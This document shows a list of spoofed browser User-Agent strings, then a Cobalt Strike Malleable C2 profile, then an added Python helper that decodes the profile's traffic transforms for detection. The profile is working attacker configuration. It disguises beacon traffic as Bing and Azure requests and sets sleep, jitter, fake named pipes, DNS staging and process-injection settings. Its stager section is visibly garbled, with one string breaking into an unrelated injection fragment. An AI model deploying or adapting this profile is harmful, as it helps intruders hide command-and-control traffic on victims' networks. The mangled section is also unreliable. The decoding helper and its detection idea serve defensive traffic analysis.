Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
Mozilla/5.0 (Windows NT 4.0) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/13.0.883.0 Safari/532.1
Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.24.3 (KHTML, like Gecko) Version/5.0 Safari/533.24.3
Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) FxiOS/16.0x3961.0 Mobile/06N899 Safari/535.1
Mozilla/5.0 (Linux; Android 2.2.2) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/59.0.803.0 Safari/534.2
Mozilla/5.0 (iPad; CPU iPad OS 10_3_4 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/30.0.834.0 Mobile/77D555 Safari/532.1
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_11_7) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/27.0.899.0 Safari/532.2
Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/10.9y6286.0 Mobile/07K099 Safari/535.2
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_7 rv:4.0; ps-AF) AppleWebKit/532.43.6 (KHTML, like Gecko) Version/5.0 Safari/532.43.6
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/47.0.856.0 Safari/534.1
Mozilla/5.0 (iPad; CPU iPad OS 3_1_3 like Mac OS X) AppleWebKit/533.1 (KHTML, like Gecko) FxiOS/15.5y8112.0 Mobile/22K809 Safari/533.1
Mozilla/5.0 (iPad; CPU iPad OS 10_3_3 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) CriOS/63.0.825.0 Mobile/59Q933 Safari/532.0
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_0 rv:2.0; bs-BA) AppleWebKit/532.2.5 (KHTML, like Gecko) Version/4.0.4 Safari/532.2.5
--------------------------------------------------------------------------------
/test.profile:
--------------------------------------------------------------------------------
## Cobalt Strike Malleable C2 Profile
## Version: Cobalt Strike 4.2
## Date : 2022-01-14 14:57:17

## Profile Name
##set sample_name "CobaltStrike Beacon";

## Sleep Times
set sleeptime "39000";
set jitter "14";
set data_jitter "107";

## Beacon User-Agent
set useragent "Mozilla/5.0 (Windows NT 4.0) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/13.0.883.0 Safari/532.1";

## Self-signed SSL Certificates with SSL Beacon
## Stager
https-certificate {
    set C "TG";
    set CN "www.bing.com";
    set O "bing.com";
    set OU "bing.com";
    set validity "365";
}

## TCP Beacon
set tcp_port "25076";
set tcp_frame_header "\x80";

## SMB beacons
set pipename "mojo.5688.8052.183894939787088877##";
set pipename_stager "mojo.5688.8052.35780273329370473##";
set smb_frame_header "\x80";

## DNS beacons
set maxdns "251";
set dns_max_txt "248";
set dns_idle "8.8.4.4";
set dns_sleep "0";
set dns_stager_prepend "v=spf1 a:mail.google.com -all";
set dns_stager_subhost ".img.123456.";

## SSH beacons
set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)";
set ssh_pipename "wkssvc##";

#code-signer {
#    set keystore "keystore.jks";
#    set password "123456";
#    set alias "google";
#}

## Staging process
set host_stage "false";
http-stager {
    set uri_x86 "/webapi/v6/Update";
    set uri_x64 "/webapi/v3/Update";

    server {
        header "Content-Type" "application/x-javascript; charset=utf-8";
        header "Server" "Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0";
        header "ETag" "0x8D817F967913E10";
        header "Content-MD5" "v6UAv4ZT5/VxZIZKh5Y+eQ==";
        header "x-ms-lease-status" "unlocked";
        header "timing-allow-origin" "*";
        output {
            prepend " t(n){for(var i=[],t=0;t 64bit injection) AND injection across session boundaries
        RtlCreateUserThread;
    }
}

## HTTP Headers
http-config {
    set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
    header "Server" "Apache";
    header "Keep-Alive" "timeout=10, max=100";
    header "Connection" "Keep-Alive";
    # Use this option if your teamserver is behind a redirector
    set trust_x_forwarded_for "true";
}

## HTTP GET
http-get {

    set uri "/rp/olDmcxJ0RfBy1PQIY51XMK-7EcM.gz.js";
    set verb "GET";

    client {

        header "Accept-Encoding" "gzip, deflate";
        header "Connection" "close";
        header "Referer" "https://www.bing.com/";


        #header "Host" "r.bing.com";

        metadata {
            base64url;
            prepend "ANID=";
            prepend "__Secure-3PAPISID=noskin;";
            append ";CONSENT=YES+CN.zh-CN+20210917-09-0";
            header "Cookie";
        }
    }

    server {

        header "Server" "Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0";
        header "Content-Type" "application/x-javascript; charset=utf-8";
        header "X-MSEdge-Ref" "Ref A4EAA043E47314793BBFE1CFBD4810146 Ref BHKG30EDGE0820 Ref C2022-01-14T06:52:58Z";
        header "X-Azure-Ref-OriginShield" "Ref A03E6EA3B4D8B47E88C93E210C6734EDB Ref BSG2EDGE2422 Ref C2022-01-10T06:59:52Z";
        header "Cache-Control" "public, max-age=432000";
        header "x-ms-lease-status" "unlocked";
        output {
            netbiosu;
            prepend "biUtil.rt.querySelectorAll(\".sbiinflnk[data-link]\"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(";
            prepend "var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!=\"undefined\"&&SbiUtil.rt&&_d.querySelectorAll)for(i=S";
            append "n),i.removeAttribute(n))},t=0;t0?lt():g())}function lt(){a(u,\"rigleamon\")}function g(){v(u,\"rigleamon\")}function nt(n){if(sj_evt.fire(\"focusChange\",\"bep\"),i){i.firstChild||(r=t(\"iframe\"),r.id=\"bepfm\",r.frameBorder=\"no\",r.scrolling=\"no\",r.height=0,sj_be(r,tt,yt,!1),i.appendChild(r),f=t(\"div\"),f.id=\"bepfl\",f.innerText=f.textContent=\"Loading...\",i.appendChild(f),vt(f));var w=_w.location.search.substr(1),g=/(^|&)rewardstesthooks=1(&|$)/i.exec(w),b=/(?:^|&)rewardsbag=([^&]*)(?:&|$)/i.exec(w),s=new Date,k=s.getDate(),d=s.getMonth()+1,nt=(d<10?\"0\":\"\")+d+\"/\"+(k<10?\"0\":\"\")+k+\"/\"+s.getFullYear();r.src=\"/rewardsapp/bepflyoutpage?style=modular&date=\"+nt+(g&&b?\"&atlahostname=localhost&bag=\"+b[1]:\"\"";
            prepend "";
            print;
        }
    }
}
--------------------------------------------------------------------------------
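The `metadata { ... }` and `output { ... }` blocks in the `http-get` section above are Malleable C2 data transforms: the beacon applies the steps top to bottom before sending, and anyone who wants to check the profile against captured traffic (the Wireshark step in the README, or a detection pipeline looking at a proxy log) has to apply them bottom to top. The following is an added example written for this page; it is not code from the JustC2file project or from Cobalt Strike. It re-implements the transform chain from `test.profile` in both directions: the client side, which wraps the metadata blob into the `Cookie` header exactly as the profile specifies, and the inverse, which recovers the blob from a captured header value. The `netbios`/`netbiosu` encodings (one letter `a-p` or `A-P` per nibble) used by the server `output` block are included; the `SERVER_OUTPUT_TRANSFORM` wrapper strings are shortened stand-ins for the profile's long JavaScript prepend/append strings, `SAMPLE_METADATA` is constructed test data, and the interpretation of `base64url` as padded URL-safe base64 is this example's reading of the transform language, to be confirmed against live traffic. The `mask` transform is deliberately left out.

```python
"""
Malleable C2 data-transform helpers (added example, not JustC2file or Cobalt
Strike code). Re-implements the http-get metadata and server output transform
chains from test.profile so a profile can be checked against captured traffic.
"""
import base64

# Steps copied from http-get { client { metadata { ... } } } in test.profile.
# The final 'header "Cookie"' step names the carrier and is kept separately.
METADATA_TRANSFORM = [
    ("base64url", None),
    ("prepend", "ANID="),
    ("prepend", "__Secure-3PAPISID=noskin;"),
    ("append", ";CONSENT=YES+CN.zh-CN+20210917-09-0"),
]
METADATA_CARRIER = ("header", "Cookie")

# Shortened stand-ins (assumption) for the profile's long JavaScript strings
# around the netbiosu-encoded tasking in http-get { server { output { ... } } }.
SERVER_OUTPUT_TRANSFORM = [
    ("netbiosu", None),
    ("prepend", "var SbiPrivacy;(function(){"),
    ("append", "})();"),
]

# Constructed stand-in for Beacon's RSA-encrypted metadata blob. A genuine blob
# is 128 random-looking bytes, so that length is a useful sanity check.
SAMPLE_METADATA = bytes(range(128))


def netbios_encode(data: bytes, upper: bool = False) -> str:
    """netbios / netbiosu: each nibble becomes one letter a-p (A-P for netbiosu)."""
    base = ord("A") if upper else ord("a")
    return "".join(chr(base + (b >> 4)) + chr(base + (b & 0x0F)) for b in data)


def netbios_decode(text: str, upper: bool = False) -> bytes:
    base = ord("A") if upper else ord("a")
    if len(text) % 2 or not all(0 <= ord(c) - base < 16 for c in text):
        raise ValueError("not a netbios-encoded string")
    nibbles = [ord(c) - base for c in text]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))


def encode(data: bytes, steps) -> str:
    """Apply the transform list in profile order (what Beacon puts on the wire)."""
    cur = data
    for name, arg in steps:
        if name == "base64":
            cur = base64.b64encode(cur)
        elif name == "base64url":
            cur = base64.urlsafe_b64encode(cur)
        elif name == "netbios":
            cur = netbios_encode(cur).encode()
        elif name == "netbiosu":
            cur = netbios_encode(cur, upper=True).encode()
        elif name == "prepend":
            cur = arg.encode() + cur
        elif name == "append":
            cur = cur + arg.encode()
        else:
            raise ValueError(f"unsupported transform: {name}")
    return cur.decode()


def decode(wire: str, steps) -> bytes:
    """Invert the transform list (what a defender does to a captured value).
    Each prepend/append is checked, not just sliced off, so a non-matching
    value raises ValueError instead of yielding garbage."""
    cur = wire.encode()
    for name, arg in reversed(steps):
        if name == "prepend":
            if not cur.startswith(arg.encode()):
                raise ValueError(f"missing prefix {arg!r}")
            cur = cur[len(arg):]
        elif name == "append":
            if not cur.endswith(arg.encode()):
                raise ValueError(f"missing suffix {arg!r}")
            cur = cur[: len(cur) - len(arg)]
        elif name == "base64":
            cur = base64.b64decode(cur, validate=True)
        elif name == "base64url":
            # Map the URL-safe alphabet back so strict validation can be used.
            cur = base64.b64decode(cur.translate(bytes.maketrans(b"-_", b"+/")), validate=True)
        elif name == "netbios":
            cur = netbios_decode(cur.decode())
        elif name == "netbiosu":
            cur = netbios_decode(cur.decode(), upper=True)
        else:
            raise ValueError(f"unsupported transform: {name}")
    return cur


def extract_metadata(request_headers: dict):
    """Recover the metadata blob from a captured request's headers, or return
    None when the carrier header is absent or does not match the profile."""
    kind, name = METADATA_CARRIER
    if kind != "header":
        raise NotImplementedError("only header carriers are handled here")
    value = next((v for k, v in request_headers.items() if k.lower() == name.lower()), None)
    if value is None:
        return None
    try:
        return decode(value, METADATA_TRANSFORM)
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    cookie = encode(SAMPLE_METADATA, METADATA_TRANSFORM)
    print("Cookie:", cookie[:72] + "...")
    blob = extract_metadata({"Host": "www.bing.com", "Cookie": cookie})
    print("recovered", len(blob), "bytes; plausible Beacon metadata:", len(blob) == 128)
    print("tasking body:", encode(b"\x00\x01\xfe\xff", SERVER_OUTPUT_TRANSFORM))
```

Running it shows the wrapped `Cookie` value the beacon would send for the constructed blob and confirms the round trip. To use it on real traffic, paste the `Cookie` value from a captured GET into `extract_metadata`; a value that does not carry the profile's exact prefix and suffix yields `None`, which is also the property a detection rule can key on: the constant `__Secure-3PAPISID=noskin;ANID=` and `;CONSENT=YES+CN.zh-CN+20210917-09-0` wrapping around a base64url body of fixed length is far more specific than the User-Agent string.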